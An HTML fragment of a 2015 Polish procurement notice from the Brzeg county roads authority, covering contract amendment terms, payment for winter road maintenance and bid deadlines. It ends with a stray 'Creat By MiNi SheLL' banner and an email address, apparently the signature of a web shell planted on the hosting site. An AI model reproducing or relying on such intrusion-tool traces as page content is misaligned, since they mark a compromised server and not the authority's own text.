<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zmiany stawki podatku VAT,
           2)wystąpienia wnioskiem do Zamawiającego o wyrażenie zgody na powierzenie 
              Podwykonawcy części zamówienia, pomimo zobowiązania w ofercie wykonania
              zamówienia bez podwykonawców.  
        2.Zmiana umowy może nastąpić na pisemny umotywowany wniosek Wykonawcy 
           za zgodą Zamawiającego na podstawie aneksu do umowy
Zamawiający zobowiązuje się zapłacić Wykonawcy za faktycznie wykonane usługi w ilości i w zakresie zależnym od warunków atmosferycznych na podstawie przedłożonych dokumentów (karty drogowe, raporty sprzętu , rozliczenie materiałów : piasku i soli drogowej), stwierdzających faktyczny czas pracy lub dyżuru sprzętu, zatwierdzonych przez obie strony według cen jednostkowych przedstawionych w formularzu cenowym Wykonawcy.
               Ilości te mają charakter orientacyjny i posłużą do ustalenia cen złożonych  ofert, 
               a w przypadku wyboru najkorzystniejszej oferty do określenia orientacyjnej wartości   
               umowy i mogą ulec zwiększeniu lub zmniejszeniu.
               Zakres do wykonania usług będzie regulowany przez Zamawiającego stosownie do    
               potrzeb uzależnionych od warunków atmosferycznych i sytuacji w terenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zdpbrzeg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Brzegu ul. Wyszyńskiego 23 49-300  Brzeg
pokój 25.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2015 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Brzegu ul. Wyszyńskiego 23 49-300  Brzeg
pokój 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com